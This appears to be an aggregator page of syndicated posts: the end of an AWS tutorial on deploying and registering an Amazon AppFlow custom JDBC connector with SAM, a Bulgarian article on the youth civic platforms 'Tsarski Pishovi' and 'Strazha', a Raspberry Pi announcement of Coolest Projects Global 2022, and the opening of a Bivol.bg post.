  PolicyPermission:
    Type: 'AWS::Lambda::Permission'
    Properties:
      FunctionName: !GetAtt ConnectorFunction.Arn
      Action: lambda:InvokeFunction
      Principal: 'appflow.amazonaws.com'
      SourceAccount: !Ref 'AWS::AccountId'
      SourceArn: !Sub 'arn:aws:appflow:${AWS::Region}:${AWS::AccountId}:*'

Deploy this custom connector by using the following command from the amazon-appflow-custom-jdbc-connector base directory:

mvn package && sam deploy –-guided

Once deployment completes, follow below steps to register and use the connector.

Registering the custom connector

There are two ways to register the custom connector.

1. Register through the AWS Management Console

  1. From the AWS Management Console, navigate to Amazon AppFlow. Select Connectors on the left-side menu. Choose on the “Register New Connector” button.
  2. Register the connector by selecting your Lambda function and typing in the connector label.
    Register a new connectorThe newly created custom connector Lambda function appears in the list if you deployed using AWS SAM by following the steps in this tutorial. If you deployed the Lambda function manually, ensure that appropriate Lambda permissions are set, as described in the Lambda Permissions and Resource Policy section.
  3. Provide a label for the connector. The label must be unique per account per Region. Choose Register.
    Provide a label
  4. The connector appears in the list of custom connectors.
    List of connectors

2. Register with the API

Invoke the registerConnector public API endpoint with the following request payload:

{
   "connectorLabel":"TestCustomConnector",
   "connectorProvisioningType":"LAMBDA",
   "connectorProvisioningConfig":{
      "lambda":{ "lambdaArn":"arn:aws:lambda:<region>:<aws_account_id>:function:<lambdaFunctionName>"
      }
   }
}

For connectorLabel, use a unique label. Currently, the only supported connectorProvisioningType is LAMBDA.

Using the new custom connector

  1. Navigate to the Connections link from the left-menu. Select the registered connector from the drop-down.
    Selecting the connector
  2. Choose Create Connection.
    Choose Create Connection
  3. Complete the connector-specific setup:
    Setup page
  4. Proceed with creating a flow and selecting your new connection.
  5. Check Lambda function’s Amazon CloudWatch Logs to troubleshoot errors, if any, during connector registration, connector profile creation, and flow execution process.

Production considerations

This example is a proof of concept. To build a production-ready solution, review the non-exhaustive list of differences between sample and production-ready solutions.

If you plan to use the custom connector with high concurrency, review AWS Lambda quotas and limitations.

Cleaning up the custom connector stack

To delete the connector:

  1. Delete all flows in Amazon AppFlow that you created as part of this tutorial.
  2. Delete any connector profiles.
  3. Unregister the custom connector.
  4. To delete the stack, run the following command from the amazon-appflow-custom-jdbc-connector base directory:
    sam delete

Conclusion

This blog post shows how to extend the Amazon AppFlow service to move data between SaaS endpoints and custom APIs. You can now build custom connectors using the Amazon AppFlow Custom Connector SDK.

Using custom connectors in Amazon AppFlow allows you to integrate siloed applications with minimal code. For example, different business units using legacy applications in an organization can now integrate their services via the Amazon AppFlow Custom Connectors SDK.

Depending on your choice of framework you can use the open source Python SDK or Java SDK from GitHub. To learn more, refer to the Custom Connector SDK Developer Guide.

For more serverless learning resources, visit Serverless Land.

Демокрацията зависи от осъзнатото участие 

Post Syndicated from Йоанна Елми original https://toest.bg/demokratsiyata-zavisi-ot-osuznatoto-uchastie/

Виждайки как повечето млади хора в чужбина са запознати с партиите, лидерите и идеологиите на настоящия политически живот и са ангажирани като граждани, се замислихме, че и ние искаме да бъдем такъв пример, на първо място – за по-малките си сестри. 

Това казват Роберта Костадинова и Виктория Лазарова, част от екипа на „Царски Пищови“ – инициатива, която цели да информира младите българи за различни аспекти на българската и световната политика по интересен, достъпен и разбираем начин. От чужбина идва вдъхновението и за друга нашумяла платформа – „Стража“, първоначално замислена като проект, подобен на немския Abgeordnetenwatch, и впоследствие адаптирана към нашата политическа реалност. Общото между „Царски Пищови“ и „Стража“ е не само политическата насоченост, а и това, че създателите са млади българи, които вярват, че не просто има смисъл от индивидуално участие в гражданския живот, а и че именно там се крие ключът към успеха.

Знанието е сила

Посланието на „Царски Пищови“ от самото начало е да насърчава младите хора в България да бъдат активни в гражданския си живот, казват Роберта и Виктория. Въпреки че фокусът им е върху политиката и социалните проблеми по света и у нас, стремежът им е да изградят у обществото култура на информираност като антидот срещу дезинформацията и манипулацията. Противно на популярната фраза, че невежеството е блаженство, те вярват на друго „клише“ – че знанието е сила.

Другата основна цел, която си поставя проектът, е да направи политическата терминология, събития и новини в България достъпни и за хора без опит и задълбочени познания в областта. Оттам идва и името на проекта – най-същественото съдържание накратко, като пищов в училище.

Искаме да провокираме дискусия и да покажем, че по много въпроси има различни мнения и добрите решения обикновено са резултат от отворен дебат, комуникация и уважение към чуждата гледна точка. 

Екипът се старае да осъществи целите си чрез споделяне на графики, илюстрации и цитати в социалните мрежи, които често стимулират публиката да обсъжда дадени теми. Антони Герасимов от „Стража“ споделя тази гледна точка:

Демокрацията не е просто лозунг. Не е достатъчно да кажем, че живеем в демокрация, и това автоматично да ни причисли към онези държави, достигнали най-справедливата форма на управление. Демокрацията е сложен организъм, съставен от институции, но и политическа култура, обществени нагласи към актуални събития и цял куп други елементи, които си взаимодействат и търпят промяна. Неглижирането на който и да от елементите дава превес на други и изважда цялата система от баланс. За да живеем в истинска демокрация, не е достатъчно просто да си повтаряме, че в Конституцията ни пише така. Затова посланието, което отправяме, е много просто, но същевременно поставя много важен казус: демокрацията не е просто лозунг и ние сме длъжни да се грижим за нея, за да не я загубим. 

Проектът работи с отворени данни, които се представят в разбираеми категории, позволявайки на хората да видят кой ги представлява в Народното събрание и как гласуват депутатите. Стенограмите от заседанията са визуализирани като чат в приложение за телефон.

От младите за младите?

Екипът на „Стража“ се стреми да включи всички граждани в демократичния процес и смята, че ако избирателните права се придобиват на 18-годишна възраст, то интересът към ставащото в държавата би следвало да се заражда в още по-ранна възраст. От инициативата искат да привлекат колкото може повече млади хора към политическото, но начинът, по който е създаден проектът, предполага широк обхват и привличане на интереса на всички възрастови групи, казва Антони. Имайки предвид, че и „Стража“, и „Царски Пищови“ са разработени онлайн, достъпът до тях предполага определено ниво на дигитална грамотност. И двете платформи разчитат достатъчно на социалните мрежи, за да бъдат видими поне за българите, които четат новини онлайн.

Самите ние сме усещали липса на адекватно политическо и гражданско образование в младежките си години – казват Роберта и Виктория. – Рядко се срещат хора, които, гласувайки за пръв път, имат ясна представа защо подкрепят конкретния кандидат или партия. Обикновено този избор е повлиян от възгледите на роднини, приятели и близки. 

Затова от „Царски Пищови“ се насочват към младите хора с цел да им осигурят арсенал от знания по политически въпроси. Когато тези базисни неща са усвоени, човек лесно може да надгражда, без да се чувства объркан от термини или от сложността на някои анализи, смятат те и се надяват, че тази основа ще помогне на младите хора да следят новините и да разбират същината на политическите проблеми – а това е първата стъпка към по-активното ангажиране с политиката и гражданското общество в страната.

„В България има страхотни млади хора – дейни, активни и ангажирани. Макар и някои от тях да трупат опит в чужбина, прави впечатление, че всички са еднакво отдадени на каузата за по-добро общество. Но е и факт, че има стереотипи спрямо младите и затова мненията им се неглижират. Гласът им сякаш няма същата тежест – поради „липса на опит“ и „влиянието на западната култура“, както често се изтъква от по-възрастните. Аудиторията ни е много разнородна и това безкрайно ни радва. Смятаме, че е сигурен знак, че политиката, екологичните и социалните проблеми не са занимание само за отбрани групи, а за всеки гражданин“, коментират Роберта и Виктория.

Ако става въпрос за клишета относно младите българи в България и в чужбина, екипът на „Стража“ покрива три различни представи: Благослав Михайлов завършва Шефилдския университет, но се връща в България; Фридрих Крепиев все още учи и живее в Германия; Антони Герасимов, с когото разговаряме, получава образованието си изцяло в България. Останалите участници в екипа също имат доста пъстра биография.

Познавам много дейни млади хора и се надявам те да стават все повече – споделя Антони. – Не бих казал, че образованието в чужбина е задължителен фактор, за да бъде един млад човек предприемчив и инициативен. Живеем в много динамична среда, която търпи постоянни промени, и увличането на младите хора в политическите процеси е неизбежно. Наречете ме безнадежден оптимист или живеещ в собствения си балон, но смятам, че качествената промяна в мисленето на много млади хора вече е факт, сега остава количествено това да се разпространи и сред останалите. Разбира се, не може да очакваме 100% от младите да са ангажирани с политиката, но смятам, че все повече започват да се интересуват от това, което се случва в страната. 

Коренна промяна в политическото съзнание

Идеята за демократично участие претърпява промяна с годините. Ако за поколенията от втората половина на XX в. гражданският дълг се състои в задължително гласуване и следене на политическия процес, то по-младите разбират изпълнението на този дълг през процеси като протести, активно участие в гражданския живот и изразяване на позиция, обвързване с каузи и гласуване по-скоро около специфични проблеми (например околна среда), отколкото за партии и идеологии. Антони е оптимист, че тези процеси се развиват и у нас:

Като част от страните от Източния блок България е в процес на трансформация от онзи поданически тип политическа култура, който е бил изграден и наложен в периода преди 1989 г. Подобна промяна е дълъг процес, от който и самите ние сме част. Съвсем нормално е да виждаме все повече млади хора, които осъзнават, че ако те не се интересуват от политиката, то политиката живо се интересува от тях. Всеки има своя професия и е отдал живота си на нея, но общото между всички нас е, че сме граждани и като такива дължим част от времето си, за да моделираме и подобряваме средата, в която живеем и желаем да се развиваме.

Антони е съгласен, че процесите се движат по-бавно, отколкото ни се иска, но вижда все повече млади хора, които разбират, че никой не им е длъжен и че добрата среда за живот зависи единствено от нас като общество. Като преподавател той вижда промяна спрямо времето, когато самият той е бил студент. Феноменът „20-годишни соцносталгици“, които са научени от семействата си, че държавата им е длъжна за всичко, без те да си мръднат пръста, се среща значително по-рядко, казва той, а след още 10 години се надява това явление да изчезне напълно. Държавата – това са гражданите и институциите, които те са създали. Промяна в нагласите трудно може да се осъществи у хора, които вече са изградили своя светоглед. Затова именно младите са носителите на новия вид политическа култура, от който демокрацията има нужда, тъй като колкото по-късно след 1989 г. си се родил, толкова по-малко си повлиян от старите привички и нагласи в обществото.

Роберта и Виктория от „Царски Пищови“ също смятат, че поради историческия товар българските граждани тотално са забравили своята огромна роля в политиката. Те виждат надежда в дейността на редица неправителствени и граждански организации и определят като позитивна тенденцията, че все повече хора намират смисъл в личния пример и се ангажират с инициативи, които допринасят за вълнуващите ги теми – било то политика, екология, човешки права, защита на животните и т.н. Ще отнеме време, докато този модел на активния гражданин се утвърди като народопсихология, но заедно можем да постигнем много, смятат те.

Едва в началото на процеса

И двете начинания са прозрачни относно методите си на работа. В „Стража“ използват отворени данни, като голяма част от работата им се състои в това да направят обемните и трудно четими файлове, качени от институциите, достъпни и разбираеми за гражданите. Това се постига чрез специален скрипт, който прехвърля информацията директно към платформата.

За публикациите си избираме теми според интереса, който са предизвикали по време на обсъжданията в парламента – уточнява Антони. – Основната цел е да предизвикаме любопитство, което да тласне хората към платформата и сами да потърсят това, което ги вълнува. Предстои да започнем да публикуваме интересни анализи, които се основават на количествени изследвания. Разполагаме с толкова данни и би било грехота, ако не установим кой е депутатът с най-богат речник или коя е любимата дума на Волен Сидеров, нали?

От „Царски Пищови“ подбират темите, като преценяват важността и се съобразяват с новините, използвайки най-различни източници – от официални сайтове на институции до местни и чуждестранни медии. Стараят се да култивират обективност и да посочват всички източници, така че аудиторията да може да ги потърси и прочете. Споделят, че безспорно имат пропуски и получават и критична обратна връзка, на която се радват, тъй като това е сигнал, че аудиторията е изградена от мислещи хора. „Ето така функционира гражданската отговорност на практика – казват те. – Разбира се, има и негативни коментари без аргументация и без предложения за подобрение. В такива случаи се опитваме да обърнем внимание на това колко по-силно е едно съобщение, когато е обосновано.“

И двата екипа имат много планове за бъдещето. За да ги осъществят, от „Царски Пищови“ се стремят на първо време да привлекат повече хора към екипа, който работи на доброволчески начала, така че всеки би могъл да се включи. „Търсим мотивирани и отговорни хора с разнообразен опит, интереси и възгледи, така че да можем да разглеждаме социалните и политическите новини и проблеми от перспективата на различни общности и да сме коректни и обективни в публикациите си. Възрастта, етносът и полът са без никакво значение за нас. Дори напротив – стремим се към разнообразие!“, казват те.

Амбициите са големи и в „Стража“:

Немските ни колеги работят с депутати, които са се съгласили да имат собствена регистрация в сайта и да отговарят на въпроси на граждани. Смятаме, че имаме потенциал да бъдем подобна връзка между гражданите и народните им представители. Успехът на такава инициатива би превърнал платформата в съществена част от българската демокрация, защото тя би създала връзка между гражданите и политическия елит, която досега е липсвала.

Антони мисли, че подобни инициативи могат да изградят критични и взискателни граждани, без значение какви са техните политически предпочитания. Той споделя, че не липсват ентусиасти, които да предлагат своята помощ, и това радва екипа.

„Стража“ се издържа единствено от граждански дарения, а „Царски Пищови“ към момента разчита на доброволен труд. Плановете за бъдещето са само повърхността на амбициите и на двата екипа, а оптимизмът им е ако не заразителен, то поне обнадеждаващ за средата в България. Вероятно затова след разговорите ни се сетих за Вазовото възклицание, макар и с малка промяна: „Младите, младите – те да са живи!“

Заглавна снимка: Josh Barwick / Unsplash

Източник

Share your tech project with the world through Coolest Projects Global 2022

Post Syndicated from original https://www.raspberrypi.org/blog/coolest-projects-global-2022-registration-open/

It’s time for young tech creators to share with the world what they’ve made! Coolest Projects Global 2022 registration is NOW OPEN. Starting today, young people can register their technology creation on the Coolest Projects Global website, where it will be featured in the online showcase gallery for the whole world to see.

Five young coders show off their robotic garden tech project for Coolest Projects.

By registering a tech project, you’ll represent your community, and you’ll get the coolest, limited-edition swag. You may even win a prize and earn the recognition of the special project judges.

What you need to know about Coolest Projects Global

Now in its 10th year, Coolest Projects is all about celebrating young people and what they create with code. Here’s what you need to know:

  • Coolest Projects Global is completely free for all participants around the world, and it’s entirely online.
  • Coolest Projects Global is open to tech creators up to 18 years old, working independently or in teams of up to 5.
  • We welcome creators of all skill levels: this world-leading technology showcase is for young people who are coding their very first project, or who are already experienced, or anything in between.
  • You’re invited to a live online celebration, which we will live-stream in early June — more details to follow.
  • Opening today, project registration stays open until 11 May.
A young coder shows off her tech project tech project for Coolest Projects to two other young tech creators.
  • Projects can be registered in the following categories: Scratch, games, web, mobile apps, hardware, and advanced programming.
  • Judges will evaluate projects based on their coolness, complexity, design, usability, and presentation.

Why Coolest Projects Global is so cool

Here are just a few of the reasons why young tech creators should register their project for the Coolest Projects Global showcase:

  • Share your project with the world. Coolest Projects Global is the world’s leading technology showcase for young people, and it’s your chance to shine on the global stage.
  • Get feedback on your project. A great team of judges will check out your project and give you feedback, which will land in your inbox after registration closes.
  • Earn some swag. Every creator who registers a project will be eligible to receive some limited-edition digital or physical swag. Pssst… Check out the sneak peek below.
  • Win a prize. Creators of projects that are selected as the judges’ favourites in the six showcase categories will receive a Coolest Projects medal to commemorate their accomplishment. The judges’ favourites will be announced at our live online celebration in June.
Two young coders work on their tech project on a laptop to control a sewing machine for Coolest Projects.

If you don’t have a tech project or an idea for one yet, you’ve got plenty of time to imagine and create, and we’re here to support you. Check out our guides to designing and building a tech creation — one that you’ll be proud to share with the Coolest Projects community in the online showcase gallery. And there’s no shortage of inspiration among the projects that young tech creators shared in last year’s showcase gallery.

Four young coders show off their tech project for Coolest Projects.

We have a lot more exciting stuff to share about Coolest Projects Global in the coming months, so be sure to subscribe for email updates. Until next time… be cool, creators!

""
A hint at the swag Coolest Projects Global participants will receive 👀

The post Share your tech project with the world through Coolest Projects Global 2022 appeared first on Raspberry Pi.

Кочината ке падне!

Post Syndicated from original https://bivol.bg/%D0%BA%D0%BE%D1%87%D0%B8%D0%BD%D0%B0%D1%82%D0%B0-%D0%BA%D0%B5-%D0%BF%D0%B0%D0%B4%D0%BD%D0%B5.html

понеделник 14 февруари 2022


Системата си работеше като добре смазана машина дълго време. Толкова дълго време, че се беше превърнало в безвремие. Всички виждахме, че нещата не са наред, някои от нас дори имаха…

The collective thoughts of the interwebz

By continuing to use the site, you agree to the use of cookies. more information

The cookie settings on this website are set to "allow cookies" to give you the best browsing experience possible. If you continue to use this website without changing your cookie settings or you click "Accept" below then you are consenting to this.

Close